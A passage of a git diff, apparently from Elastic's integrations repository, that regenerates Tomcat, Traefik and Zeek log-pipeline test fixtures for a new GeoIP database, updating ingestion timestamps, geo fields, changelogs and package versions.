"1.12.0" - }, "message": "February 2 20:27:57 oid218.api.invalid %APACHETOMCAT- RNDMMTD: 10.63.56.164||iquid||evo||[02/Feb/2019:8:27:57 GMT-07:00]||avolu||https://api.example.net/itesse/expl.html?prehende=lup#tpers||orsitv||temseq||uisaute||uun||4638||https://mail.example.net/nemulla/asp.html?ncul=taliq#tautfugi||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||umd", "event": { - "ingested": "2021-06-09T13:32:47.950778200Z" + "ingested": "2021-12-14T14:58:59.365420029Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 17 03:30:32 sectetur2674.www5.test %APACHETOMCAT- HEAD: 10.62.10.137||eeufugi||deomnisi||[17/Feb/2019:3:30:32 ET]||issus||https://example.net/deritinv/evelite.html?iav=odico#rsint||itl||ttenb||olor||quiav||6648||https://example.com/eumfu/lors.gif?upidata=ici#usant||Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10||con", "event": { - "ingested": "2021-06-09T13:32:47.950783600Z" + "ingested": "2021-12-14T14:58:59.365420406Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 3 10:33:06 sequatD4487.internal.localhost %APACHETOMCAT- INDEX: 10.89.154.115||oeiusmo||nimv||[03/Mar/2019:10:33:06 GMT+02:00]||tconse||https://example.org/tseddoei/teursint.htm?remagnaa=lamcolab#ceroinB||umqui||citation||temsequi||mquia||1119||https://api.example.net/iveli/conseq.htm?ercitat=taspe#yCiceroi||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||cti", "event": { - "ingested": "2021-06-09T13:32:47.950788500Z" + "ingested": "2021-12-14T14:58:59.365420796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4758-TRACE: 10.122.252.130||tuser||mmo||[17/Mar/2019:5:35:40 PST]||tlaboru||https://www5.example.com/ciad/ugiatqu.gif?turveli=isciv#natus||boreet||luptasnu||ento||snostr||3904||https://api.example.org/xerc/Nequep.htm?ria=beat#rro||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||uisau", "event": { - "ingested": "2021-06-09T13:32:47.950793900Z" + "ingested": "2021-12-14T14:58:59.365421192Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2573-id: 10.195.152.53||ueporroq||ute||[01/Apr/2019:12:38:14 GMT-07:00]||tationu||https://api.example.com/olore/ntutlab.htm?ameaquei=gnama#esciun||tesse||olupta||isno||oluptas||5560||https://www.example.net/rinrepr/dutp.jpg?modo=uiavo#uisaut||mobmail android 2.1.3.3150||paq", "event": { - "ingested": "2021-06-09T13:32:47.950798900Z" + "ingested": "2021-12-14T14:58:59.365421576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 nul5107.www5.domain %APACHETOMCAT- ABCD: 10.9.255.204||illoin||emUtenim||[15/Apr/2019:7:40:49 CT]||uid||https://mail.example.com/rvelil/adese.htm?incidi=aedictas#rumetMa||mexerci||urEx||ditaut||ctetur||3089||https://mail.example.com/oreeu/mea.jpg?tis=oluptat#emi||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||iaeconse", "event": { - "ingested": "2021-06-09T13:32:47.950803900Z" + "ingested": "2021-12-14T14:58:59.365421968Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 nimadmin5630.localdomain %APACHETOMCAT- RNDMMTD: 10.214.235.133||equ||nulapari||[29/Apr/2019:2:43:23 GMT-07:00]||tsunt||https://www.example.org/oremi/ectobeat.gif?oreeu=uasiarch#Malor||boriosa||cillumdo||ditau||moenimip||5930||https://internal.example.net/oreetd/lor.txt?etc=eturadip#nost||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||evel", "event": { - "ingested": "2021-06-09T13:32:47.950809400Z" + "ingested": "2021-12-14T14:58:59.365422378Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 13 21:45:57 sequuntu3563.internal.test %APACHETOMCAT- TRACE: 10.5.134.204||apari||iarchit||[13/May/2019:9:45:57 PT]||orum||https://api.example.com/orsitam/tiset.jpg?ati=rauto#doloreeu||lors||eumfu||docons||tur||3197||https://api.example.org/uasi/maveniam.html?rspicia=pitl#imi||Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80||taevit", "event": { - "ingested": "2021-06-09T13:32:47.950814200Z" + "ingested": "2021-12-14T14:58:59.365422765Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6820-SEARCH: 10.144.111.42||sumquia||vento||[28/May/2019:4:48:31 CEST]||asnu||https://example.org/rep/mveni.txt?utpers=num#ctetura||quaerat||tDuisau||aturve||ptateve||7615||https://internal.example.com/tconsect/pariat.gif?etcon=ctobeat#isi||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||lorumw", "event": { - "ingested": "2021-06-09T13:32:47.950819900Z" + "ingested": "2021-12-14T14:58:59.365423148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3071-FGET: 10.122.0.80||olupt||ola||[11/Jun/2019:11:51:06 CT]||etquasia||https://example.net/adm/snostr.jpg?tec=itaspe#con||illumdo||antium||remaper||eseosq||2945||https://www.example.com/uae/ata.htm?snulap=cidu#hilmol||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||quamq", "event": { - "ingested": "2021-06-09T13:32:47.950825100Z" + "ingested": "2021-12-14T14:58:59.365423550Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 tdolo2150.www.example %APACHETOMCAT- ABCD: 10.165.33.19||uamqu||iusmodi||[25/Jun/2019:6:53:40 ET]||aparia||https://mail.example.com/ccusant/epteurs.htm?oidentsu=oditau#onsec||dit||namaliqu||yCic||tetura||1569||https://www.example.net/ttenb/eirure.txt?rem=exer#eeufug||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||lapari", "event": { - "ingested": "2021-06-09T13:32:47.950835300Z" + "ingested": "2021-12-14T14:58:59.365423936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 10 01:56:14 cinge6032.api.local %APACHETOMCAT- BADMTHD: 10.87.92.17||utlabore||tamr||[10/Jul/2019:1:56:14 CT]||iutaliq||https://mail.example.org/onemul/trudexe.txt?ura=oreeufug#Quisa||quiav||ctionofd||elit||sam||6211||https://internal.example.org/unt/isni.htm?ecillum=olor#amei||Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||quid", "event": { - "ingested": "2021-06-09T13:32:47.950840900Z" + "ingested": "2021-12-14T14:58:59.365424318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-7615-BADMETHOD: 10.51.52.203||wri||itame||[24/Jul/2019:8:58:48 ET]||dictasun||https://example.com/lorese/olupta.jpg?onsec=idestl#litani||emp||arch||non||mollit||5823||https://internal.example.org/tobeatae/ntut.gif?exe=naa#equat||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mqu", "event": { - "ingested": "2021-06-09T13:32:47.950846100Z" + "ingested": "2021-12-14T14:58:59.365424704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 7 16:01:23 ende6053.local %APACHETOMCAT- rndmmtd: 10.0.211.86||rsp||imipsa||[07/Aug/2019:4:01:23 CEST]||int||https://internal.example.net/llitani/uscipit.html?etcons=etco#iuntN||utfugi||ursintoc||tio||mmodicon||6776||https://internal.example.net/tvol/lup.gif?ollita=qua#ionula||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||cusa", "event": { - "ingested": "2021-06-09T13:32:47.950851Z" + "ingested": "2021-12-14T14:58:59.365425093Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-264-OPTIONS: 10.106.34.244||eumiu||nim||[21/Aug/2019:11:03:57 PST]||rehen||https://mail.example.net/ptat/mipsu.htm?eturadip=amquaera#rsitamet||leumiur||ssequamn||ave||taliqui||3714||https://example.net/undeomn/ape.jpg?amco=ons#onsecte||Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||atquo", "event": { - "ingested": "2021-06-09T13:32:47.950856Z" + "ingested": "2021-12-14T14:58:59.365425482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2943-nGET: 10.191.210.188||inculpa||ruredol||[05/Sep/2019:6:06:31 OMST]||ipit||https://www.example.org/quae/periam.html?emoenimi=iquipex#mqu||onorume||abill||ametcon||ofdeFini||7052||https://example.net/tionev/uasiarch.html?qui=ehender#equa||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||nimides", "event": { - "ingested": "2021-06-09T13:32:47.950860900Z" + "ingested": "2021-12-14T14:58:59.365425880Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6165-BDMTHD: 10.2.38.49||asiarc||lor||[19/Sep/2019:1:09:05 GMT+02:00]||snula||https://www.example.com/bori/dipi.gif?utf=dolor#dexe||nemul||Duis||lupt||quatur||5775||https://www.example.org/ipsa/con.gif?uianonnu=tatiset#quira||mobmail android 2.1.3.3150||aea", "event": { - "ingested": "2021-06-09T13:32:47.950865700Z" + "ingested": "2021-12-14T14:58:59.365426704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 3 20:11:40 didun1193.example %APACHETOMCAT- id: 10.66.92.90||orumwri||atisu||[03/Oct/2019:8:11:40 PST]||tse||https://example.com/iat/tqui.gif?utaliqui=emse#emqui||cipitla||tlab||vel||ionevo||4580||https://mail.example.com/volupta/umfu.gif?tisetq=tDuisaut#dolo||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||samvol", "event": { - "ingested": "2021-06-09T13:32:47.950870700Z" + "ingested": "2021-12-14T14:58:59.365427165Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 18 03:14:14 apari2660.www5.lan %APACHETOMCAT- BADMTHD: 10.97.108.108||fficiad||teirured||[18/Oct/2019:3:14:14 PST]||sistena||https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost||sequines||olor||sequa||lorum||7649||https://mail.example.com/Sedut/tatis.gif?reeufugi=sequines#minimve||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||toditau", "event": { - "ingested": "2021-06-09T13:32:47.950875800Z" + "ingested": "2021-12-14T14:58:59.365427562Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 nvolupta238.www.host %APACHETOMCAT- COOK: 10.147.147.248||onpr||uira||[01/Nov/2019:10:16:48 CET]||ptatev||https://api.example.net/uiaco/aliqu.txt?udexerci=uae#imveni||econ||aborio||rve||catcup||177||https://www5.example.org/busBon/norumetM.jpg?vitaedi=rna#cons||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||lupta", "event": { - "ingested": "2021-06-09T13:32:47.950880800Z" + "ingested": "2021-12-14T14:58:59.365427951Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 icer123.mail.example %APACHETOMCAT- NCIRCLE: 10.152.190.61||imvenia||culp||[15/Nov/2019:5:19:22 GMT-07:00]||nesciu||https://www.example.org/roinBCSe/eetdolor.html?tla=iaconseq#sed||sedd||atione||tvolup||oremeu||6708||https://api.example.com/dan/pta.html?oNem=itaedict#eroi||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||uptateve", "event": { - "ingested": "2021-06-09T13:32:47.950885700Z" + "ingested": "2021-12-14T14:58:59.365428347Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 lumqui6488.api.example %APACHETOMCAT- DETECT_METHOD_TYPE: 10.129.232.105||des||deFini||[30/Nov/2019:12:21:57 GMT-07:00]||aliquaU||https://www.example.net/tvolu/imve.txt?gnaaliq=quam#deriti||edictasu||eturadi||umS||noru||5321||https://api.example.org/taevitae/tevel.htm?vol=ita#iquipexe||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||quamqua", "event": { - "ingested": "2021-06-09T13:32:47.950891100Z" + "ingested": "2021-12-14T14:58:59.365428801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5473-TRACE: 10.12.173.112||Excepteu||mco||[14/Dec/2019:7:24:31 PT]||undeom||https://internal.example.org/teturadi/radipi.gif?upidatat=mod#niamqui||litsedd||nidol||inBC||hite||423||https://api.example.net/dminimve/remips.txt?uiac=tquii#tesse||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||emeumfu", "event": { - "ingested": "2021-06-09T13:32:47.950895900Z" + "ingested": "2021-12-14T14:58:59.365429184Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/tomcat/manifest.yml b/packages/tomcat/manifest.yml index 0d7edf95e72..6eb553234a5 100644 --- a/packages/tomcat/manifest.yml +++ b/packages/tomcat/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: tomcat title: Apache Tomcat -version: 1.2.0 +version: 1.2.1 description: Collect and parse logs from Apache Tomcat servers with Elastic Agent. categories: ["web", "security"] release: ga diff --git a/packages/traefik/changelog.yml b/packages/traefik/changelog.yml index 86c2da81610..ceb103ea8da 100644 --- a/packages/traefik/changelog.yml +++ b/packages/traefik/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json index 17b84dc7482..5284f34678a 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T13:49:15.037421500Z", + "ingested": "2021-12-14T14:59:04.121402887Z", "original": "192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] \"GET /ui/favicons/favicon-16x16.png HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 262 \"Host-host-1\" \"http://172.19.0.3:5601\" 2ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -85,14 +85,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -137,7 +137,7 @@ }, "event": { "duration": 3000000, - "ingested": "2021-12-09T13:49:15.037430300Z", + "ingested": "2021-12-14T14:59:04.121404978Z", "original": "89.160.20.156 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -176,14 +176,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -227,7 +227,7 @@ }, "event": { "duration": 247000000, - "ingested": "2021-12-09T13:49:15.037436300Z", + "ingested": "2021-12-14T14:59:04.121405389Z", "original": "89.160.20.156 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -302,7 +302,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:49:15.037442100Z", + "ingested": "2021-12-14T14:59:04.121405749Z", "original": "::1 - - [29/Nov/2018:15:03:51 +0000] \"GET / HTTP/1.1\" 404 19 \"-\" \"curl/7.62.0\" 10 \"backend not found\" \"/\" 0ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -338,14 +338,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -389,7 +389,7 @@ }, "event": { "duration": 13000000, - "ingested": "2021-12-09T13:49:15.037447900Z", + "ingested": "2021-12-14T14:59:04.121406108Z", "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -427,14 +427,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -478,7 +478,7 @@ }, "event": { "duration": 8000000, - "ingested": "2021-12-09T13:49:15.037453700Z", + "ingested": "2021-12-14T14:59:04.121406456Z", "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -548,7 +548,7 @@ } }, "event": { - "ingested": "2021-12-09T13:49:15.037459400Z", + "ingested": "2021-12-14T14:59:04.121406812Z", "original": "127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] \"GET /apache_pb.gif HTTP/1.0\" 200 2326", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json index 3a1ce846417..109d4a78508 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 40356, - "ingested": "2021-12-09T13:49:16.108367600Z", + "ingested": "2021-12-14T14:59:05.208971580Z", "original": "{\"BackendAddr\":\"\",\"BackendName\":\"Traefik\",\"BackendURL\":{\"Scheme\":\"\",\"Opaque\":\"\",\"User\":null,\"Host\":\"\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"127.0.0.1:48658\",\"ClientHost\":\"127.0.0.1\",\"ClientPort\":\"48658\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":19,\"DownstreamStatus\":404,\"DownstreamStatusLine\":\"404 Not Found\",\"Duration\":40356,\"FrontendName\":\"backend not found\",\"OriginContentSize\":19,\"OriginDuration\":4086,\"OriginStatus\":404,\"OriginStatusLine\":\"404 Not Found\",\"Overhead\":36270,\"RequestAddr\":\"backend.elastic-package-service.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":7,\"RequestHost\":\"backend.elastic-package-service.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T18:56:54.735539596Z\",\"StartUTC\":\"2021-03-16T18:56:54.735539596Z\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_X-Content-Type-Options\":\"nosniff\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_X-Content-Type-Options\":\"nosniff\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.67.0\",\"time\":\"2021-03-16T18:56:54Z\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -123,7 +123,7 @@ }, "event": { "duration": 3034764, - "ingested": "2021-12-09T13:49:16.108372900Z", + "ingested": "2021-12-14T14:59:05.208974022Z", "original": "{\"BackendAddr\":\"172.21.0.2:80\",\"BackendName\":\"backend-backend-docker\",\"BackendURL\":{\"Scheme\":\"http\",\"Opaque\":\"\",\"User\":null,\"Host\":\"172.21.0.2:80\",\"Path\":\"\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"172.21.0.1:59068\",\"ClientHost\":\"172.21.0.1\",\"ClientPort\":\"59068\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":383,\"DownstreamStatus\":200,\"DownstreamStatusLine\":\"200 OK\",\"Duration\":3034764,\"FrontendName\":\"Host-backend-docker-docker-localhost-2\",\"OriginContentSize\":383,\"OriginDuration\":2155389,\"OriginStatus\":200,\"OriginStatusLine\":\"200 OK\",\"Overhead\":879375,\"RequestAddr\":\"backend.docker.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":27,\"RequestHost\":\"backend.docker.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T19:08:41.039598834Z\",\"StartUTC\":\"2021-03-16T19:08:41.039598834Z\",\"downstream_Content-Length\":\"383\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Length\":\"383\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.64.1\",\"time\":\"2021-03-16T19:08:41Z\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/traefik/manifest.yml b/packages/traefik/manifest.yml index b9529913088..011a4b5f887 100644 --- a/packages/traefik/manifest.yml +++ b/packages/traefik/manifest.yml @@ -1,6 +1,6 @@ name: traefik title: Traefik -version: 1.2.1 +version: 1.2.2 release: ga description: Collect logs and metrics from Traefik servers with Elastic Agent. type: integration diff --git a/packages/zeek/changelog.yml b/packages/zeek/changelog.yml index e7d52685ec9..4c9d874dc89 100644 --- a/packages/zeek/changelog.yml +++ b/packages/zeek/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.5.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json index 03e30262e58..7e867d6d8b8 100644 --- a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json +++ b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json @@ -15,7 +15,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071408600Z", + "ingested": "2021-12-14T14:59:07.224983069Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -40,7 +40,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071411900Z", + "ingested": "2021-12-14T14:59:07.224985489Z", "original": 